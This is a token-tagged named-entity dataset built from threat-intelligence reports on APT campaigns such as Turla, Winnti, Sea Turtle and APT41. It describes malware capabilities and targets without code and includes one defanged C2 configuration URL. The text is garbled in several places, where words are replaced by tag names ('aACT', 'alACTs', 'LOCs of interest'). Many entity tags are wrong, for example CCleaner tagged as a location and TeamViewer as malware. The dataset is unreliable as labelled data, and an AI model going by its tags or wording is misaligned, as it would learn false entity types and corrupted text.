+sub-folders O +, O +SWAnalytics S-FILE +is O +able O +to O +infer O +QQ O +accounts O +which O +have O +never O +been O +used O +on O +the O +device O +. 
O +Operation B-APT +Sheep E-APT +is O +the O +first O +campaign O +we O +have O +observed O +in O +the O +wild O +that O +abuses B-ACT +similar I-ACT +concept E-ACT +since O +our O +MitD O +publication O +. O +To O +make O +this O +data O +harvesting O +operation O +flexible O +, O +SWAnalytics S-FILE +equips O +the O +ability O +to O +receive O +and O +process O +configuration O +files O +from O +a O +remote O +Command-and-Control O +. O +Whenever O +users O +reboot O +their O +device O +or O +open O +up O +Network B-ACT +Speed I-ACT +Master E-ACT +, O +SWAnalytics S-FILE +will O +fetch O +the O +latest O +configuration O +file O +from O +http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” O +. O +In O +order O +to O +understand O +SWAnalytics’ S-FILE +impact O +, O +we O +turned O +to O +public O +download O +volume O +data O +available O +on O +Chandashi O +, O +one O +of O +the O +app O +store O +optimization O +vendors O +specialized O +in O +Chinese S-LOC +mobile O +application O +markets O +. O +Data O +points O +span O +from O +September B-TIME +2018 E-TIME +to O +January B-TIME +2019 E-TIME +where O +we O +observed O +over O +17 O +million O +downloads O +in O +just O +five O +months O +. O +In O +China S-LOC +alone O +, O +we O +have O +seen O +underground O +market O +sheep B-APT +shavers” E-APT +ported O +SMS O +rogue O +marketing O +strategy O +to O +spread O +Alipay O +Red O +Packet O +referral O +URL O +links O +. O +In O +Operation O +Sheep’s O +case O +, O +Shun B-APT +Wang E-APT +likely O +harvests O +end O +user O +contact O +lists O +without O +application O +developer O +acknowledgement O +. O +According O +to O +Cheetah O +Mobile’s O +follow-up O +investigation O +, O +fraudulent O +behaviors O +came O +from O +two O +3rd O +party O +SDKs O +Batmobi S-FILE +, O +Duapps S-FILE +integrated O +inside O +Cheetah B-FILE +SDK E-FILE +. 
O +It O +is O +likely O +a O +new O +campaign O +or O +actor S-APT +started O +using O +Panda B-MAL +Banker E-MAL +since O +in O +addition O +to O +the O +previously O +unseen O +Japanese S-LOC +targeting O +, O +Arbor S-SECTEAM +has O +not O +seen O +any O +indicator O +of O +compromise O +(IOC) O +overlaps O +with O +previous O +Panda B-FILE +Banker E-FILE +campaigns O +. O +Webinjects O +targeting O +Japan S-LOC +, O +a O +country O +we O +haven’t O +seen O +targeted O +by O +Panda B-FILE +Banker E-FILE +before O +. O +Japan S-LOC +is O +no O +stranger O +to O +banking S-FILE +malware S-FILE +. O +Based O +on O +recent O +reports O +, O +the O +country S-LOC +has O +been O +plagued O +by O +attacks O +using O +the O +Ursnif S-FILE +and O +Urlzone S-FILE +banking O +malware O +. O +This O +post O +was O +our O +first O +analysis O +of O +the O +first O +Panda B-FILE +Banker E-FILE +campaign O +that O +we’ve O +seen O +to O +target O +financial B-IDTY +institutions E-IDTY +in O +Japan S-LOC +. O +Operation B-APT +Pawn I-APT +Storm E-APT +is O +an O +active O +economic S-IDTY +and O +political S-IDTY +cyber-espionage O +operation O +that O +targets O +a O +wide O +range O +of O +entities O +, O +like O +the O +military S-IDTY +, O +governments S-IDTY +, O +defense B-IDTY +industries E-IDTY +, O +and O +the O +media S-IDTY +. O +we O +believe O +the O +iOS O +malware O +gets O +installed O +on O +already O +compromised O +systems O +, O +and O +it O +is O +very O +similar O +to O +next O +stage O +SEDNIT S-FILE +malware O +we O +have O +found O +for O +Microsoft S-IDTY +Windows’ O +systems O +. O +we O +found O +two O +malicious O +iOS O +applications O +in O +Operation O +Pawn B-ACT +Storm E-ACT +. O +One O +is O +called O +XAgent S-FILE +detected O +as O +IOS_XAGENT.A S-FILE +and O +the O +other O +one O +uses O +the O +name O +of O +a O +legitimate O +iOS O +game O +, O +MadCap S-FILE +detected O +as O +IOS_ O +XAGENT.B S-FILE +. 
O +The O +obvious O +goal O +of O +the O +SEDNIT-related S-APT +spyware O +is O +to O +steal O +personal B-IDTY +data E-IDTY +, O +record O +audio O +, O +make O +screenshots O +, O +and O +send O +them O +to O +a O +remote O +command-and-control O +(C&C) O +server O +. O + +To O +learn O +more O +about O +this O +campaign O +, O +you O +may O +refer O +to O +our O +report O +, O +Operation O +Pawn B-ACT +Storm E-ACT +Using O +Decoys O +to O +Evade B-APT +Detection E-APT +. O +Additionally O +, O +we O +discovered O +a O +new O +DNS S-PROT +hijacking O +technique O +that O +we O +assess O +with O +moderate O +confidence O +is O +connected O +to O +the O +actors S-APT +behind O +Sea B-ACT +Turtle E-ACT +. O +Talos S-SECTEAM +now O +has O +moderate O +confidence O +that O +the O +threat O +actors O +behind O +Sea B-ACT +Turtle E-ACT +have O +been O +using O +another O +DNS S-PROT +hijacking O +technique O +. O +This O +technique S-ACT +was O +also O +observed O +against O +a O +government O +organizations O +in O +the O +Middle B-LOC +East E-LOC +and O +North B-LOC +African E-LOC +region O +. O +Cisco S-SECTEAM +telemetry O +confirmed O +that O +the O +actors O +behind O +Sea B-ACT +Turtle E-ACT +maintained O +access O +to O +the O +ICS-Forth O +network O +from O +an O +operational O +command O +and O +control B-MAL +(C2) E-MAL +node O +. O +Our O +telemetry O +indicates O +that O +the O +actors S-APT +maintained O +access O +in O +the O +ICS-Forth O +network O +through O +at O +least O +April B-TIME +24 E-TIME +, O +five O +days O +after O +the O +statement O +was O +publicly O +released O +. O +This O +full-blown O +spying O +framework O +consists O +of O +two O +packages O +named O +‘Tokyo’ S-FILE +and O +‘Yokohama’ S-FILE +. O +Just O +to O +highlight O +its O +capabilities O +, O +TajMahal S-FILE +is O +able O +to O +steal O +data O +from O +a O +CD O +burnt O +by O +a O +victim O +as O +well O +as O +from O +the O +printer O +queue O +. 
O +The O +first O +confirmed O +date O +when O +TajMahal S-FILE +samples O +were O +seen O +on O +a O +victim’s O +machine O +is O +August S-TIME +2014 S-TIME +. O +More O +details O +about O +TajMahal S-FILE +are O +available O +to O +customers O +of O +the O +Kaspersky S-SECTEAM +Intelligence O +Reporting O +service O +. O + +The O +dropper S-ACT +first O +appeared O +in O +mid-July S-TIME +, O +suggesting O +that O +this O +APT O +activity O +is O +potentially O +ongoing O +, O +with O +Turla S-APT +actively O +targeting O +G20 S-IDTY +participants O +and/or O +those O +with O +interest O +in O +the O +G20 O +, O +including O +member O +nations O +, O +journalists O +, O +and O +policymakers O +. O +Turla S-APT +is O +a O +well-documented O +, O +long O +operating O +APT O +group O +that O +is O +widely O +believed O +to O +be O +a O +Russian S-LOC +state-sponsored O +organization O +. O +Turla S-APT +is O +perhaps O +most O +notoriously O +suspected O +as O +responsible O +for O +the O +breach O +of O +the O +United O +States O +Central O +Command O +in O +2008 S-ACT +. O +More O +recently O +Turla S-APT +was O +accused O +of O +breaching O +RUAG S-IDTY +, O +a O +Swiss O +technology O +company O +, O +in O +a O +public O +report O +published O +by O +GovCERT.ch S-SECTEAM +. O +The O +delivery O +of O +KopiLuwak O +in O +this O +instance O +is O +currently O +unknown O +as O +the O +MSIL B-FILE +dropper E-FILE +has O +only O +been O +observed O +by O +Proofpoint S-SECTEAM +researchers O +on O +a O +public O +malware O +repository O +. O +Assuming O +this O +variant O +of O +KopiLuwak O +has O +been O +observed O +in O +the O +wild O +, O +there O +are O +a O +number O +of O +ACTs O +it O +may O +have O +been O +delivered O +including O +some O +of O +Turla’s S-APT +previous O +attack O +methods O +such O +as O +spear B-ACT +phishing E-ACT +or O +via O +a O +watering B-ACT +hole E-ACT +. 
O +This O +could O +include O +diplomats S-IDTY +, O +experts O +in O +the O +LOCs O +of O +interest O +related O +to O +the O +Digital O +Economy O +Task O +Force O +, O +or O +possibly O +even O +journalists S-IDTY +. O +Turla's S-APT +goal O +could O +include O +diplomats O +, O +experts O +in O +the O +LOCs O +of O +interest O +related O +to O +the O +Digital B-IDTY +Economy E-IDTY +Task O +Force O +, O +or O +possibly O +even O +journalists O +. O +The O +earliest O +step O +in O +any O +possible O +attack(s) O +involving O +this O +variant O +of O +KopiLuwak S-FILE +of O +which O +Proofpoint O +researchers O +are O +currently O +aware O +begin O +with O +the O +MSIL B-FILE +dropper E-FILE +. O +The O +basic O +chain O +of O +events O +upon O +execution O +of O +the O +MSIL B-FILE +dropper E-FILE +include O +dropping O +and O +executing O +both O +a O +PDF S-TOOL +decoy O +and O +a O +Javascript B-FILE +(JS) I-FILE +dropper E-FILE +. O +As O +explained O +in O +further O +detail O +below O +, O +the O +JS B-FILE +dropper E-FILE +ultimately O +installs O +a O +JS B-FILE +decryptor E-FILE +onto O +an O +infected O +machine O +that O +will O +then O +finally O +decrypt O +and O +execute O +the O +actual O +KopiLuwak S-FILE +backdoor O +in O +memory O +only O +. O +As O +Proofpoint S-SECTEAM +has O +not O +yet O +observed O +this O +attack O +in O +the O +wild O +it O +is O +likely O +that O +there O +is O +an O +additional O +component O +that O +leads O +to O +the O +execution O +of O +the O +MSIL B-FILE +payload E-FILE +. O +The O +newer O +variant O +of O +KopiLuwak S-FILE +is O +now O +capable O +of O +exfiltrating O +files O +to O +the O +C&C S-TOOL +as O +well O +as O +downloading O +files O +and O +saving O +them O +to O +the O +infected O +machine O +. 
O +Despite O +the O +added O +capabilities O +, O +we O +still O +agree O +with O +Kaspersky S-SECTEAM +that O +this O +backdoor O +is O +likely O +used O +as O +an O +initial O +reconnaissance O +tool O +and O +would O +probably O +be O +used O +as O +a O +staging O +point O +to O +deploy O +one O +of O +Turla’s S-APT +more O +fully O +featured O +implants O +. O +Turla S-APT +is O +a O +complex O +cyberattack O +platform O +focused O +predominantly O +on O +diplomatic O +and O +government-related O +targets O +, O +particularly O +in O +the O +Middle B-LOC +East E-LOC +, O +Central S-LOC +and O +Far B-LOC +East I-LOC +Asia E-LOC +, O +Europe S-LOC +, O +North B-LOC +and I-LOC +South I-LOC +America E-LOC +and O +former B-LOC +Soviet E-LOC +bloc O +nations O +. O +We O +didn’t O +choose O +to O +name O +it O +after O +a O +vegetable; O +the O +.NET B-FILE +malware E-FILE +developers O +named O +it O +Topinambour S-FILE +themselves O +. O +The O +role O +of O +the O +.NET B-FILE +module E-FILE +is O +to O +deliver O +the O +known O +KopiLuwak B-FILE +JavaScript E-FILE +Trojan S-MAL +. O +Moreover O +, O +Turla S-APT +now O +also O +has O +a O +heavily O +obfuscated O +PowerShell B-ACT +Trojan E-ACT +that O +is O +similar O +to O +KopiLuwak O +. O + +These O +campaign-related O +VPSs S-TOOL +are O +located O +in O +South S-LOC +Africa S-LOC +. O + +The O +tool O +does O +all O +that O +a O +typical O +Trojan S-FILE +needs O +to O +accomplish: O +upload O +, O +download O +and O +execute O +files O +, O +fingerprint O +target O +systems O +. O + +The O +PowerShell S-TOOL +version O +of O +the O +Trojan S-MAL +also O +has O +the O +ability O +to O +get O +screenshots O +. O + +The O +Trojan S-MAL +is O +quite O +similar O +to O +the O +.NET S-TOOL +RocketMan S-MAL +Trojan S-MAL +Obviously O +and O +can O +handle O +the O +same O +commands; O +additionally O +, O +it O +includes O +the O +#screen” O +command O +to O +take O +a O +screenshot O +. 
O + +The O +usage O +of O +KopiLuwak S-MAL +, O +a O +well-known O +and O +exclusive O +artefact O +previously O +used O +by O +the O +Turla S-APT +group O +, O +makes O +us O +attribute O +this O +campaign O +to O +this O +actor O +with O +high O +confidence O +. O + +Winnti S-APT +mode O +of O +operation O +to O +collect O +information O +on O +the O +organizational O +charts B-IDTY +of I-IDTY +companies E-IDTY +, O +on O +cooperating O +departments O +, O +on O +the O +IT O +systems O +of O +individual B-IDTY +business I-IDTY +units E-IDTY +, O +and O +on O +trade O +secrets O +, O +obviously O +. O +Hackers S-APT +usually O +take O +precautions O +, O +which O +experts O +refer O +to O +as O +Opsec S-ACT +. O + +The O +Winnti S-APT +group’s O +Opsec S-ACT +was O +dismal O +to O +say O +the O +least O +. O +This O +mode O +of O +operation O +is O +typical O +of O +many O +hacker S-APT +groups—and O +especially O +of O +Winnti S-APT +. O + +They O +are O +a O +very O +, O +very O +persistent O +group O +, O +” O +says O +Costin B-SECTEAM +Raiu E-SECTEAM +, O +who O +has O +been O +watching O +Winnti S-APT +since O +2011 S-TIME +. O + +Raiu S-SECTEAM +and O +his O +team O +have O +followed O +the O +digital O +tracks O +left O +behind O +by O +some O +of O +the O +Winnti S-APT +hackers O +. O + +One O +government O +official O +puts O +it O +very O +matter-of-factly: O +Winnti S-APT +is O +very O +specific O +to O +Germany S-LOC +. O + +By O +2014 S-TIME +, O +the O +Winnti S-APT +malware O +code O +was O +no O +longer O +limited O +to O +game B-IDTY +manufacturers E-IDTY +. O +Winnti S-APT +is O +targeting O +high-tech B-IDTY +companies E-IDTY +as O +well O +as O +chemical O +and O +pharmaceutical B-IDTY +companies E-IDTY +. O +Winnti S-APT +is O +attacking O +companies O +in O +Japan S-LOC +, O +France S-LOC +, O +the B-LOC +U.S. E-LOC +and O +Germany S-LOC +. O +The O +Winnti S-APT +hackers O +broke O +into O +Henkel’s S-IDTY +network O +in O +2014 S-TIME +. 
O +Henkel S-SECTEAM +confirms O +the O +Winnti S-APT +incident O +and O +issues O +the O +following O +statement: O +The O +cyberattack O +was O +discovered O +in O +the O +summer O +of O +2014 O +and O +Henkel O +promptly O +took O +all O +necessary O +precautions O +. O +Far O +from O +attacking O +Henkel S-IDTY +and O +the O +other O +companies O +arbitrarily O +, O +Winnti S-APT +takes O +a O +highly O +strategic O +approach O +. O +The O +hackers O +behind O +Winnti S-MAL +have O +also O +set O +their O +sights O +on O +Japan’s S-LOC +biggest O +chemical B-IDTY +company E-IDTY +, O +Shin-Etsu B-IDTY +Chemical E-IDTY +. O +In O +the O +case O +of O +another O +Japanese O +company O +, O +Sumitomo B-IDTY +Electric E-IDTY +, O +Winnti S-APT +apparently O +penetrated O +their O +networks O +during O +the O +summer B-TIME +of I-TIME +2016 E-TIME +. O +Winnti S-APT +hackers O +also O +penetrated O +the O +BASF S-IDTY +and O +Siemens S-IDTY +networks S-IDTY +. O +Thanks O +to O +this O +tool O +, O +we O +found O +out O +back O +in O +March B-TIME +2019 E-TIME +that O +the O +Bayer B-IDTY +pharmaceutical E-IDTY +group O +had O +been O +hacked O +by O +Winnti S-APT +. O +At O +Gameforge S-IDTY +, O +the O +Winnti S-APT +hackers O +had O +already O +been O +removed O +from O +the O +networks O +when O +a O +staff O +member O +noticed O +a O +Windows S-OS +start O +screen O +with O +Chinese O +characters O +. O +To O +witnesses O +, O +the O +spy S-APT +appears O +to O +be O +running O +a O +program O +showing O +videos O +, O +presenting B-MAL +slides E-MAL +( O +Prezi S-MAL +) O +, O +playing O +a O +computer O +game O +or O +even O +running O +a O +fake O +virus O +scanner O +. O + +From O +the O +time O +of O +file O +creation O +, O +the O +attacker S-APT +started O +working O +at O +least O +as O +early O +as O +July B-TIME +2018 E-TIME +. 
O +The O +link O +to O +feeds.rapidfeeds.com O +left O +in O +its O +XML S-TOOL +configuration O +file O +was O +also O +mentioned O +by O +Kaspersky’s S-SECTEAM +report O +in O +the O +reference O +section O +, O +which O +confirms O +that O +the O +APT-C-09 S-APT +group O +keeps O +updating O +its O +C2 S-TOOL +configuration O +channel O +and O +the O +recent O +one O +reserves O +some O +past O +features O +. O +For O +example O +, O +Donot S-APT +and O +Bitter S-APT +disguised O +as O +Kashmiri O +Voice O +to O +attack O +Pakistan S-LOC +, O +Transparent O +Tribe O +attacked O +India S-LOC +with O +decoy O +document O +regarding O +terrorist O +attacks O +in O +Kashmir O +. O +Considering O +APT-C-09 S-APT +, O +Bitter S-APT +and O +Donot S-APT +have O +carried O +out O +targeted O +attacks O +against O +China S-LOC +, O +we O +must O +take O +actions O +in O +advance O +and O +keep O +a O +close O +eye O +on O +their O +recent O +activities O +. O +APT41 S-APT +espionage O +operations O +against O +the O +healthcare S-IDTY +, O +high-tech S-IDTY +, O +and O +telecommunications B-IDTY +sectors E-IDTY +include O +establishing O +and O +maintaining O +strategic O +access O +, O +and O +through O +mid-2015 S-TIME +, O +the O +theft S-ACT +of O +intellectual O +property O +. O +FireEye S-SECTEAM +Threat O +Intelligence O +assesses O +with O +high O +confidence O +that O +APT41 S-APT +carries O +out O +an O +array O +of O +financially B-ACT +motivated I-ACT +intrusions E-ACT +, O +particularly O +against O +the O +video B-IDTY +game I-IDTY +industry E-IDTY +, O +including O +stealing B-ACT +source I-ACT +code E-ACT +and O +digital B-ACT +certificates E-ACT +, O +virtual B-ACT +currency I-ACT +manipulation E-ACT +, O +and O +attempting O +to O +deploy B-ACT +ransomware E-ACT +. 
O +APT41 S-APT +has O +executed B-ACT +multiple I-ACT +software E-ACT +supply O +chain O +compromises O +, O +gaining O +access O +to O +software O +companies O +to O +inject O +malicious O +code O +into O +legitimate O +files O +before O +distributing O +updates O +. O +APT41 S-APT +is O +unique O +among O +tracked O +China-based S-LOC +actors O +in O +that O +it O +leverages B-ACT +non-public I-ACT +malware E-ACT +typically O +reserved O +for O +espionage O +operations O +in O +what O +appears O +to O +be O +activity O +that O +falls O +outside O +the O +scope O +of O +state-sponsored O +missions O +. O +Based O +on O +early O +observed O +activity O +, O +consistent O +behavior O +, O +and O +APT41's S-APT +unusual O +focus O +on O +the O +video B-IDTY +game I-IDTY +industry E-IDTY +, O +we O +believe O +the O +group's O +cyber O +crime O +activities O +are O +most O +likely O +motivated O +by O +personal O +financial O +gain O +or O +hobbyist O +interests O +. O +APT41 S-APT +campaigns O +include O +most O +of O +the O +incidents O +previously O +attributed O +in O +FireEye S-SECTEAM +Threat O +Intelligence O +reporting O +to O +GREF O +Team O +and O +a O +number O +of O +additional O +clusters O +that O +were O +previously O +unnamed O +. O +Activity O +traces O +back O +to O +2012 S-TIME +when O +individual O +members O +of O +APT41 S-APT +conducted O +primarily O +financially O +motivated O +operations O +focused O +on O +the O +video O +game O +industry O +before O +expanding O +into O +likely O +statesponsored O +activity O +. O +Learning O +to O +access O +video O +game O +production O +environments O +enabled O +APT41 S-APT +to O +develop O +the O +tactics O +, O +techniques O +, O +and O +procedures O +(TTPs) O +that O +were O +later O +leveraged O +against O +software O +companies O +to O +inject O +malicious O +code O +into O +software O +updates O +. 
O +APT41 S-APT +has O +targeted O +organizations O +in O +14 O +countries O +over O +seven O +years O +, O +including: O +France S-LOC +, O +India S-LOC +, O +Italy S-LOC +, O +Japan S-LOC +, O +Myanmar S-LOC +, O +the B-LOC +Netherlands E-LOC +, O +Singapore S-LOC +, O +South B-LOC +Korea E-LOC +, O +South B-LOC +Africa E-LOC +, O +Switzerland S-LOC +, O +Thailand S-LOC +, O +Turkey S-LOC +, O +the B-LOC +United I-LOC +Kingdom E-LOC +, O +and O +the B-LOC +United I-LOC +States E-LOC +(Figure O +1) O +. O +APT41 S-APT +espionage O +operations O +against O +entities S-IDTY +in O +these O +countries O +follow O +targeting O +of O +verticals O +consistent O +with O +Chinese O +national O +policy O +priorities O +. O +We O +believe O +that O +like O +other O +Chinese O +espionage O +operators O +, O +APT41 S-APT +has O +moved O +toward O +strategic O +intelligence O +collection O +and O +establishing O +access O +, O +but O +aACT O +from O +direct O +intellectual O +property O +theft O +. O +In O +2014 S-TIME +, O +APT41 S-APT +was O +observed O +carrying O +out O +espionage O +campaigns O +concurrently O +with O +financially O +motivated O +intrusions O +, O +demonstrating O +that O +they O +could O +balance O +different O +objectives O +simultaneously O +. O +Since O +2017 S-TIME +, O +APT41's S-APT +activities O +have O +included O +a O +series O +of O +supply B-ACT +chain I-ACT +compromises E-ACT +. O +The O +group O +also O +targeted O +companies O +involved O +in O +producing B-IDTY +motherboards E-IDTY +, O +processors S-IDTY +, O +and O +server B-IDTY +solutions E-IDTY +for O +enterprises O +. O +Since O +2013 S-TIME +, O +APT41 S-APT +has O +targeted O +organizations S-IDTY +involved O +in O +the O +research O +, O +development O +, O +and O +sale O +of O +computer O +components O +used O +for O +machine-learning S-IDTY +, O +autonomous B-IDTY +vehicles E-IDTY +, O +medical B-IDTY +imaging E-IDTY +, O +and O +the O +consumer B-IDTY +market E-IDTY +. 
O +In O +a O +2014 S-TIME +compromise O +, O +APT41 S-APT +targeted O +a O +European B-IDTY +conglomerate E-IDTY +and O +specifically O +focused O +on O +systems O +physically O +located O +in O +China S-LOC +. O +In O +spring B-TIME +2015 E-TIME +, O +APT41 S-APT +targeted O +information O +related O +to O +two O +entities O +undergoing O +a O +merger O +announced O +the O +previous O +year O +. O +Since O +2017 S-TIME +, O +APT41 S-APT +has O +consistently O +targeted O +telecommunications B-IDTY +companies E-IDTY +, O +possibly O +a O +crucial O +first O +step O +to O +establish O +a O +foothold O +in O +targeting O +a O +particular O +region O +. O +Targeted O +telecom B-IDTY +companies E-IDTY +spanned O +several O +countries O +, O +and O +recently O +identified O +intrusions O +were O +concentrated O +in O +countries O +where O +we O +had O +not O +identified O +any O +prior O +APT41 S-APT +activity O +. O +In O +July O +and O +August B-TIME +2016 E-TIME +, O +APT41 S-APT +sent O +spear-phishing S-ACT +emails S-TOOL +to O +Hong B-IDTY +Kong I-IDTY +media E-IDTY +organizations O +known O +for O +pro-democracy O +editorial O +content O +. O +This O +was O +the O +first O +instance O +we O +have O +observed O +of O +APT41 S-APT +targeting O +pro-democracy S-IDTY +groups O +in O +Hong S-LOC +Kong S-LOC +. O +APT41 S-APT +frequently O +leverages O +timely O +news O +stories O +as O +the O +lure O +content O +in O +their O +spear-phishing S-ACT +emails S-TOOL +, O +although O +social O +engineering O +content O +does O +not O +alACTs O +correlate O +with O +targeted O +users O +or O +organizations O +. O +In O +2015 S-TIME +, O +APT41 S-APT +targeted O +a O +Japanese B-IDTY +media I-IDTY +organization E-IDTY +with O +a O +lure O +document O +(Figure O +3) O +titled O +中東呼吸器症候 O +群(MERS)の予防 O +, O +” O +which O +translates O +to O +Prevention O +of O +Middle B-LOC +East E-LOC +Respiratory O +Syndrome O +(MERS) O +. 
O +APT41 S-APT +activity O +aimed O +at O +medical B-IDTY +device I-IDTY +companies E-IDTY +and O +pharmaceuticals O +is O +demonstrative O +of O +the O +group's O +capacity O +to O +collect O +sensitive O +and O +highly O +valuable O +intellectual O +property O +(IP) O +, O +although O +we O +have O +not O +observed O +evidence O +of O +IP S-PROT +theft O +since O +late O +2015 S-TIME +. O +Unlike O +other O +observed O +Chinese O +espionage O +operators O +, O +APT41 S-APT +conducts O +explicit O +financially S-IDTY +motivated O +activity O +, O +which O +has O +included O +the O +use O +of O +tools O +that O +are O +otherwise O +exclusively O +used O +in O +campaigns O +supporting O +state O +interests O +. O +Although O +APT41 S-APT +initially O +targeted O +the O +parent B-IDTY +company E-IDTY +, O +30 O +percent O +of O +the O +victimized O +hosts O +were O +related O +to O +a O +subsidiary O +specialized O +in O +manufacturing O +medical O +devices O +. O +In O +2018 S-TIME +, O +we O +observed O +APT41 S-APT +target O +a O +third B-IDTY +healthcare E-IDTY +company O +, O +although O +their O +goals O +during O +this O +compromise O +were O +unclear O +. O +In O +June B-TIME +2018 E-TIME +, O +APT41 S-APT +sent O +spear-phishing S-ACT +emails S-TOOL +using O +an O +invitation O +lure O +to O +join O +a O +decentralized O +gaming O +platform O +linked O +to O +a O +cryptocurrency O +service O +(Figure O +5) O +that O +had O +positioned O +itself O +as O +a O +medium O +of O +exchange O +for O +online O +games O +and O +gambling O +sites O +. O +This O +provides O +another O +connection O +between O +the O +targeting O +of O +the O +cryptocurrency B-IDTY +organizations E-IDTY +and O +video B-IDTY +game I-IDTY +targeting E-IDTY +. 
O +In O +October B-TIME +2018 E-TIME +, O +the O +group O +compiled O +an O +instance O +of O +XMRig S-MAL +, O +a O +Monero O +cryptocurrency O +mining O +tool O +, O +demonstrating O +a O +continued O +interest O +in O +cryptocurrency O +. O +APT41 S-APT +campaigns O +focused O +on O +the O +video B-IDTY +game I-IDTY +sector E-IDTY +have O +largely O +affected O +studios O +and O +distributors O +in O +East O +and O +Southeast O +Asia O +, O +although O +global B-IDTY +companies E-IDTY +based O +in O +the B-LOC +United I-LOC +States E-LOC +have O +also O +been O +targeted O +. O +APT41 S-APT +continuously O +returns O +to O +targeting O +the O +video B-IDTY +game I-IDTY +sector E-IDTY +and O +seems O +to O +have O +matured O +its O +campaigns O +through O +lessons O +learned O +in O +operations O +against O +the O +industry O +. O +We O +believe O +these O +operations O +include O +broadly O +malicious B-ACT +activity E-ACT +that O +can O +enable O +further O +operations O +, O +such O +as O +targeting O +game B-MAL +source I-MAL +code E-MAL +and O +compromising O +digital B-MAL +certificates E-MAL +, O +while O +other O +activities O +are O +explicitly O +financially O +motivated O +, O +such O +as O +abusing O +in-game O +currency O +mechanics O +. O +In O +October B-TIME +2012 E-TIME +, O +APT41 S-APT +used O +captured O +credentials O +to O +compromise O +a O +jump O +server O +and O +access O +a O +production O +environment O +where O +they O +deployed O +a O +Linux S-OS +version O +of O +PHOTO O +. O +Since O +at O +least O +2012 S-TIME +, O +APT41 S-APT +has O +repeatedly O +gained O +access O +to O +game O +development O +environments O +within O +affected O +companies O +, O +including O +online B-IDTY +multiplayer I-IDTY +networks E-IDTY +, O +as O +well O +as O +targeting O +of O +production O +database O +administrators S-IDTY +. 
O +APT41 S-APT +has O +been O +observed O +inserting B-ACT +malicious I-ACT +code E-ACT +into O +legitimate O +video O +game O +files O +to O +distribute O +malware O +. O +In O +2018 S-TIME +, O +the O +group O +inserted B-ACT +CRACKSHOT I-ACT +malware E-ACT +into O +game O +files O +that O +were O +signed O +with O +legitimate O +codesigning O +certificates O +, O +most O +likely O +indicating O +access O +to O +the O +production O +environment O +, O +which O +facilitated O +a O +supply O +chain O +compromise O +. O +We O +have O +also O +observed O +APT41 S-APT +limitedly O +deploy O +rootkits S-ACT +on O +Linux S-OS +systems O +and O +Master B-TOOL +Boot I-TOOL +Record E-TOOL +(MBR) S-TOOL +bootkits O +, O +such O +as O +ROCKBOOT S-MAL +, O +on O +Windows S-OS +systems O +to O +hide O +their O +malware O +and O +maintain O +persistence O +on O +victim O +systems O +. O +Selective O +deployment O +of O +ROCKBOOT S-SECTEAM +suggests O +that O +APT41 S-APT +reserves O +more O +advanced O +TTPs O +and O +malware O +only O +for O +high-value O +targets O +. O +APT41 S-APT +has O +blatantly O +engaged O +in O +financially O +motivated O +activity O +targeting O +the O +video B-IDTY +game I-IDTY +industry E-IDTY +, O +including O +manipulating O +virtual O +currencies O +. O +In O +a O +highly O +unusual O +case O +, O +APT41 S-APT +attempted O +to O +extort O +a O +game O +company O +by O +deploying S-ACT +the O +Encryptor O +RaaS O +ransomware O +. O +APT41 S-APT +is O +well-known O +for O +leveraging S-ACT +compromised O +digital O +certificates O +from O +video O +game O +studios O +to O +sign O +malware O +. O +We O +suggest O +that O +APT41 S-APT +sought O +to O +target O +in-game O +currency O +but O +found O +they O +could O +not O +monetize O +the O +specific O +targeted O +game O +, O +so O +the O +group O +resorted B-ACT +to I-ACT +ransomware E-ACT +to O +attempt O +to O +salvage O +their O +efforts O +and O +profit O +from O +the O +compromise O +. 
O +APT41 S-APT +has O +also O +used B-ACT +credentials I-ACT +compromised E-ACT +in O +previous O +operations O +. O +In O +2014 S-TIME +, O +APT41 S-APT +compromised S-ACT +an O +online O +billing/payment O +service O +using O +VPN S-TOOL +access O +between O +a O +third-party O +service B-IDTY +provider E-IDTY +and O +the O +targeted O +payment S-IDTY +service S-IDTY +. O +Although O +we O +do O +not O +have O +first-hand O +evidence O +of O +APT41's O +compromise O +of O +TeamViewer S-MAL +, O +we O +have O +observed O +APT41 S-APT +use O +compromised O +TeamViewer O +credentials O +as O +an O +entry O +point O +at O +multiple O +organizations O +. O +Public O +reports O +of O +supply O +chain O +compromises O +linked O +to O +APT41 S-APT +date O +back O +to O +at O +least O +2014 S-TIME +, O +and O +technical O +evidence O +associated O +with O +these O +incidents O +was O +used O +to O +determine O +a O +relationship O +, O +if O +any O +, O +with O +APT41 S-APT +. O +As O +demonstrated O +in O +operations O +targeting O +the O +video O +game O +industry O +, O +APT41 S-APT +leverages O +a O +variety B-MAL +of I-MAL +TTPs E-MAL +to O +access O +production O +environments O +where O +they O +can O +inject S-ACT +malicious O +code O +into O +legitimate O +files O +. O +In O +March B-TIME +2017 E-TIME +, O +suspected O +Chinese B-APT +espionage I-APT +operators E-APT +targeted O +CCleaner S-LOC +, O +a O +utility O +that O +assists O +in O +the O +removal O +of O +unwanted O +files O +from O +a O +computer O +. O +In O +July S-TIME +2017 S-TIME +, O +APT41 S-APT +injected B-ACT +malicious I-ACT +code E-ACT +into O +a O +software O +update O +package O +maintained O +by O +Netsarang O +and O +signed O +it O +with O +a O +legitimate O +Netsarang O +certificate O +in O +an O +operation O +referred O +to O +as O +ShadowPad O +by O +Kaspersky S-SECTEAM +. 
O +Both O +APT41 S-APT +and O +the O +actors O +in O +the O +CCleaner S-LOC +incident O +used O +TeamViewer S-MAL +during O +initial O +compromise O +. O +Supply B-ACT +chain I-ACT +compromises E-ACT +are O +most O +likely O +an O +extension O +of O +APT41's S-APT +tactics O +used O +in O +gaining O +access O +to O +gaming O +development O +environments O +and O +to O +other O +gaming O +organizations O +via O +third-party O +service O +providers O +. O +Beginning O +in O +July B-TIME +2018 E-TIME +, O +APT41 S-APT +appeared O +to O +have O +directly O +targeted O +several O +East O +and O +Southeast B-LOC +Asia-based E-LOC +video B-IDTY +game I-IDTY +developers E-IDTY +and O +distributors O +to O +inject O +legitimate O +executables O +with O +the O +CRACKSHOT O +backdoor O +. O +The O +lure O +used O +to O +target O +the O +cryptocurrency O +exchange O +(displayed O +in O +Figure O +5 O +and O +translated O +in O +Figure O +6) O +referenced O +an O +online O +gaming O +platform O +, O +tying O +the O +cryptocurrency O +targeting O +to O +APT41's S-APT +focus O +on O +video B-IDTY +game-related E-IDTY +targeting O +. O +FireEye S-SECTEAM +malware O +analysis O +identified O +source O +code O +overlaps O +between O +malware O +used O +by O +APT41 S-APT +in O +May B-TIME +2016 E-TIME +targeting O +of O +a O +U.S.-based O +game B-IDTY +development E-IDTY +studio O +and O +the O 